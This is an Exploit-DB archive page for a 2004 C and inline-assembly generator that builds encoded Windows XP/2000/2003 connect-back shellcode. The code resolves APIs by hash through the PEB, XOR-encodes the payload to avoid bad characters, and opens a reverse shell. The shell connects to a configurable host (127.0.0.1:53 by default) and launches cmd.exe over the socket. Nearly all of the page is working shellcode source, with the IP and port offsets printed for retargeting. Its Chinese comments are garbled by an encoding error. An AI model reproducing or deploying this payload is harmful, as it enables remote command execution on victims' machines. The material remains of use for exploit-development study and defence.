Windows (XP/2000/2003) - Reverse (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)

EDB-ID:

13528

CVE:

N/A


Author:

lion


Platform:

Generator

Date:

2004-10-25


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

/*
*-----------------------------------------------------------------------
* 
* connectback_v32.c - Connect Back shellcode for Overflow exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author  : lion
*     : lion@cnhonker.net
*     : http://www.cnhonker.com
*     :
* Date   : 2003-08-15
*     :
* Update  : 2004-05-22 v3.2
*     : 2004-05-05 v3.1 
*     : 2004-01-08 v3.0
*     : 2003-09-10 v2.0 
*     : 2003-08-15 v1.0 
*     :
* Tested  : Windows 2000/Windows XP/windows 2003
*     :
* Notice  : 1. ͨ¹ýpebÈ¡µÃkernel32.dllµØÖ·¡£
*     : 2. ͨ¹ýº¯ÊýµÄhashÖµÀ´½øÐбȽϣ¬´úÌæGetProcAddressÈ¡µÃº¯ÊýµØÖ·£¬½ÚÊ¡º¯ÊýÃûÕ¼ÓõĿռ䡣
*     : 3. ÀûÓÃÑ­»·»ñÈ¡hashÖµºÍº¯ÊýµØÖ·£¬½ÚÊ¡¿Õ¼ä¡£
*     : 4. ·´Á¬¶Ë¿ÚÀ´»ñµÃshell¡£
*     : 5. ÓÃvc6¿ÉÒÔÃüÁîÐÐÖ±½Ó±àÒ룬·½±ãÐ޸ġ£
*     : 6. win2000/winxp/win2003 ϲâÊԳɹ¦¡£
*     : 7. ÔÚʹ´úÂëÒ×ÓÚÐ޸ĵÄͬʱ×î´óÓÅ»¯Îª´óС275 bytes¡£
*     :
* Complie : cl connectback_v32.c
*     :
* Reference: http://www.lsd-pl.net/documents/winasm-1.0.1.pdf
*     : http://www.metasploit.com/shellcode.html
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

// Use for find the ASM code
#define PROC_BEGIN           __asm _emit 0x90 __asm _emit 0x90\
                    __asm _emit 0x90 __asm _emit 0x90\
                    __asm _emit 0x90 __asm _emit 0x90\
                    __asm _emit 0x90 __asm _emit 0x90
#define PROC_END            PROC_BEGIN
#define SEARCH_STR           "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define SEARCH_LEN           8
#define MAX_SC_LEN           2048
#define HASH_KEY            13

// Define Decode Parameter
#define DECODE_LEN           21
#define SC_LEN_OFFSET         7
#define ENC_KEY_OFFSET         11
#define ENC_KEY            0x99


// Define Function Addr
#define ADDR_LoadLibraryA       [esi]
#define ADDR_CreateProcessA      [esi+4]
#define ADDR_ExitProcess        [esi+8]
#define ADDR_WaitForSingleObject    [esi+12]
#define ADDR_WSASocketA        [esi+16]
#define ADDR_connect          [esi+20]
#define ADDR_closesocket        [esi+24]
//#define ADDR_WSAStartup        [esi+28]
//#define ADDR_CMD            [esi+32]

// Need functions
unsigned char functions[100][128] =     
{                      // [esi] stack layout
  // kernel32 4              // 00 kernel32.dll
  {"LoadLibraryA"},            //  [esi]
  {"CreateProcessA"},           //  [esi+4]    
  {"ExitThread"},             //  [esi+8]
  //{"ExitProcess"},
  //{"TerminateProcess"},
  {"WaitForSingleObject"},        //  [esi+12] 
  //{"WaitForSingleObjectEx"},

  // ws2_32 3              // 01 ws2_32.dll
  {"WSASocketA"},             //  [esi+16]   
  {"connect"},              //  [esi+20]		
  {"closesocket"},            //  [esi+24]
  //{"WSAStartup"},            //  [esi+28]
  {""},
};

// Shellcode string
unsigned char sc[1024] = {0};

// ASM shellcode main function
void  ShellCode();

// Get function hash
static DWORD __stdcall GetHash ( char *c )
{
  DWORD h = 0;
  
  while ( *c )
  {
    __asm ror h, HASH_KEY
    
    h += *c++;
  }
  return( h );
}

// Print Shellcode 
void PrintSc(unsigned char *sc, int len)
{
  int  i,j;
  char *p;
  char msg[6];
  
  //printf("/* %d bytes */\n", buffsize);
  
  // Print general shellcode
  for(i = 0; i < len; i++)
  {
    if((i%16)==0)
    {
      if(i!=0)
        printf("\"\n\"");
      else
        printf("\"");
    }
    
    //printf("\\x%.2X", sc[i]);
    
    sprintf(msg, "\\x%.2X", sc[i] & 0xff);

    for( p = msg, j=0; j < 4; p++, j++ )
    {
      if(isupper(*p))
        printf("%c", _tolower(*p));
      else
        printf("%c", p[0]);
    }
  }
  
  printf("\";\n");
}


void Make_ShellCode()
{
  unsigned char *pSc_addr;
  unsigned int  Sc_len;
  unsigned int  Enc_key=ENC_KEY;
  unsigned long dwHash[100];
  unsigned int  dwHashSize;

  int i,j,k,l;
  
  
  // Get functions hash
  printf("[+] Get functions hash strings.\r\n");
  for (i=0;;i++) 
  {
    if (functions[i][0] == '\x0') break;

    dwHash[i] = GetHash((char*)functions[i]);
    printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
  }
  dwHashSize = i*4;


  // Deal with shellcode
  pSc_addr = (unsigned char *)ShellCode;
  
  for (k=0;k<MAX_SC_LEN;++k ) 
  {
    if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) 
    {
      break;
    }
  }
  pSc_addr+=(k+SEARCH_LEN);        // Start of the ShellCode
  
  for (k=0;k<MAX_SC_LEN;++k) 
  {
    if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
      break;
    }
  }
  Sc_len=k;                // Length of the ShellCode
  
  memcpy(sc, pSc_addr, Sc_len);      // Copy shellcode to sc[]


  // Add functions hash
  memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
  Sc_len += dwHashSize;


  // Print the size of shellcode.
  printf("[+] %d + %d = %d bytes shellcode\n", Sc_len-DECODE_LEN, DECODE_LEN, Sc_len);

  // Print the ip/port offset
  for(k=0; k <= Sc_len-3; ++k)
  {
    if(sc[k] == 0x00 && sc[k+1] == 0x35)
      printf("/* port offset: %d + %d = %d */\r\n", k-DECODE_LEN, DECODE_LEN, k);
    if(sc[k] == 0x7F && sc[k+3] == 0x01)
      printf("/* ip offset: %d + %d = %d */\r\n", k-DECODE_LEN, DECODE_LEN, k);
  }

/*        
  for(i=DECODE_LEN; i<Sc_len; i++)
  {
    sc[i] ^= Enc_key;
  }
*/

  // Print shellcode
  //PrintSc(sc, Sc_len); 
  

  // Deal with find the right XOR byte
  for(i=0xff; i>0; i--)
  {
    l = 0;
    for(j=DECODE_LEN; j<Sc_len; j++)
    {
      if ( 
          ((sc[j] ^ i) == 0x26) || //%
          ((sc[j] ^ i) == 0x3d) || //=
          ((sc[j] ^ i) == 0x3f) || //?
          ((sc[j] ^ i) == 0x40) || //@
          ((sc[j] ^ i) == 0x00) ||
          ((sc[j] ^ i) == 0x0D) ||
          ((sc[j] ^ i) == 0x0A) 
        )              // Define Bad Characters
      {
        l++;            // If found the right XOR byte£¬l equals 0
        break;
      };
    }
  
    if (l==0)
    {
      Enc_key = i;
      
      //printf("[+] Find XOR Byte: 0x%02X\n", i);
      for(j=DECODE_LEN; j<Sc_len; j++)
      {
        sc[j] ^= Enc_key;
      }

      break;             // If found the right XOR byte, Break
    }
  }

  // Deal with not found XOR byte
  if (l!=0)
  {
    printf("[-] No xor byte found!\r\n");
    exit(-1);
  }

  // Deal with DeCode string
  //memcpy(&sc[SC_LEN_OFFSET], &Sc_len, 2);
  *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len-DECODE_LEN;
  *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;

  // Print decode
  printf("/* %d bytes decode */\r\n", DECODE_LEN);
  PrintSc(sc, DECODE_LEN);

  // Print shellcode
  printf("/* %d bytes shellcode, xor with 0x%02x */\r\n", Sc_len-DECODE_LEN, Enc_key);
  PrintSc((char*)sc+DECODE_LEN, Sc_len-DECODE_LEN);
}

void main()
{
  DWORD  addr;
  WSADATA    wsa;
  
  WSAStartup(MAKEWORD(2,2),&wsa);
  
  Make_ShellCode();

  addr = (DWORD)&sc;

  __asm
  {
    jmp addr
  }

  return;
}

// ShellCode function
void ShellCode()
{
  __asm
  {
    PROC_BEGIN             // C macro to begin proc
//--------------------------------------------------------------------
//
// DeCode
//
//--------------------------------------------------------------------
    jmp   short decode_end
    
decode_start:
    pop   ebx             // Decode start addr (esp -> ebx)
    dec   ebx
    xor   ecx,ecx
    mov   cl,0xFF           // Decode len
    
  decode_loop:
    xor   byte ptr [ebx+ecx],0x99   // Decode key
    loop  decode_loop
    jmp   short decode_ok

decode_end:
    call  decode_start
    
decode_ok:

//--------------------------------------------------------------------
//
// ShellCode
//
//--------------------------------------------------------------------
    jmp   sc_end
    
sc_start:     
    pop   edi             // Hash string start addr (esp -> edi)

    // Get kernel32.dll base addr
    mov   eax, fs:0x30        // PEB
    mov   eax, [eax+0x0c]       // PROCESS_MODULE_INFO
    mov   esi, [eax+0x1c]       // InInitOrder.flink 
    lodsd                // eax = InInitOrder.blink
    mov   ebp, [eax+8]        // ebp = kernel32.dll base address

    mov   esi, edi          // Hash string start addr -> esi
  
    // Get function addr of kernel32
    push  4
    pop   ecx
    
  getkernel32:
    call  GetProcAddress_fun
    loop  getkernel32

    // Get ws2_32.dll base addr
    push  0x00003233
    push  0x5f327377
    push  esp
    call  ADDR_LoadLibraryA     // LoadLibraryA("ws2_32");
    
    //mov   ebp, eax          // ebp = ws2_32.dll base address
    xchg  eax, ebp

    // Get function addr of ws2_32
    push  3
    pop   ecx

  getws2_32:
    call  GetProcAddress_fun
    loop  getws2_32

/*   
//LWSAStartup:
    sub   esp, 400
    push  esp
    push  0x101
    call  ADDR_WSAStartup       // WSAStartup(0x101, &WSADATA);
*/

//LWSASocketA:
    push  ecx
    push  ecx
    push  ecx
    push  ecx

    push  1
    push  2
    call  ADDR_WSASocketA       // s=WSASocketA(2,1,0,0,0,0);

    //mov   ebx, eax          // socket -> ebx
    xchg  eax, ebx

//Lconnect:
    push  0x0100007F 					// host: 127.0.0.1 
    push  0x35000002 					// port: 53 
    mov   ebp, esp
    
    push  0x10            // sizeof(sockaddr_in)
    push  ebp             // sockaddr_in address
    push  ebx             // socket s
    call  ADDR_connect        // connect(s, name, sizeof(name));

    // if connect failed , exit
    test  eax, eax
    jne   Finished
		
//    xor   eax, eax
    
    // allot memory for STARTUPINFO, PROCESS_INFORMATION
    mov   edi, esp
      
    // zero out SI/PI
    push  0x12
    pop   ecx
  stack_zero:
    stosd
    loop  stack_zero
    
    //mov   byte ptr [esp+0x10], 0x44  // si.cb = sizeof(si)
    //inc   byte ptr [esp+0x3C]     // si.dwFlags
    //inc   byte ptr [esp+0x3D]     // si.wShowWindow
    //mov   [esp+0x48], ebx       // si.hStdInput = s
    //mov   [esp+0x4C], ebx       // si.hStdOutput = s
    //mov   [esp+0x50], ebx       // si.hStdError = s
    
    mov   word ptr [esp+0x3c], 0x0101
    xchg  eax, ebx
    stosd
    stosd
    stosd
  
    mov   edi, esp
  
    // push "cmd"
    push  0x00646d63         // "cmd"
    mov   ebp, esp

    push  eax             // socket
		
//LCreateProcess:
    lea   eax, [edi+0x10]          
    push  edi             // pi
    push  eax             // si
    push  ecx             // lpCurrentDirectory
    push  ecx             // lpEnvironment
    push  ecx             // dwCreationFlags
    push  1              // bInheritHandles
    push  ecx             // lpThreadAttributes
    push  ecx             // lpProcessAttributes
    push  ebp             // lpCommandLine = "cmd"
    push  ecx             // lpApplicationName NULL
    call  ADDR_CreateProcessA     // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi);
  
//LWaitForSingleObject:
    //push  1  
    push  0xFFFFFFFF
    push  dword ptr [edi]
    call  ADDR_WaitForSingleObject  // WaitForSingleObject(Handle, time) ;

//LCloseSocket:
    //push  ebx
    call  ADDR_closesocket      // closesocket(c);

Finished:
    //push  1
    call  ADDR_ExitProcess      // ExitProcess();

// 
GetProcAddress_fun:  
    push  ecx
    push  esi
  
    mov   esi, [ebp+0x3C]       // e_lfanew
    mov   esi, [esi+ebp+0x78]     // ExportDirectory RVA
    add   esi, ebp          // rva2va
    push  esi
    mov   esi, [esi+0x20]       // AddressOfNames RVA
    add   esi, ebp          // rva2va
    xor   ecx, ecx
    dec   ecx

  find_start:
    inc   ecx
    lodsd
    add   eax, ebp
    xor   ebx, ebx
    
  hash_loop:
    movsx  edx, byte ptr [eax]
    cmp   dl, dh
    jz   short find_addr
    ror   ebx, HASH_KEY        // hash key
    add   ebx, edx
    inc   eax
    jmp   short hash_loop
   
  find_addr:
    cmp   ebx, [edi]         // compare to hash
    jnz   short find_start
    pop   esi             // ExportDirectory
    mov   ebx, [esi+0x24]       // AddressOfNameOrdinals RVA
    add   ebx, ebp          // rva2va
    mov   cx, [ebx+ecx*2]       // FunctionOrdinal
    mov   ebx, [esi+0x1C]       // AddressOfFunctions RVA
    add   ebx, ebp          // rva2va
    mov   eax, [ebx+ecx*4]      // FunctionAddress RVA
    add   eax, ebp          // rva2va
    stosd                // function address save to [edi]
    
    pop   esi
    pop   ecx
    ret
    
sc_end:
    call sc_start
    
    PROC_END              //C macro to end proc
  }
}

// milw0rm.com [2004-10-25]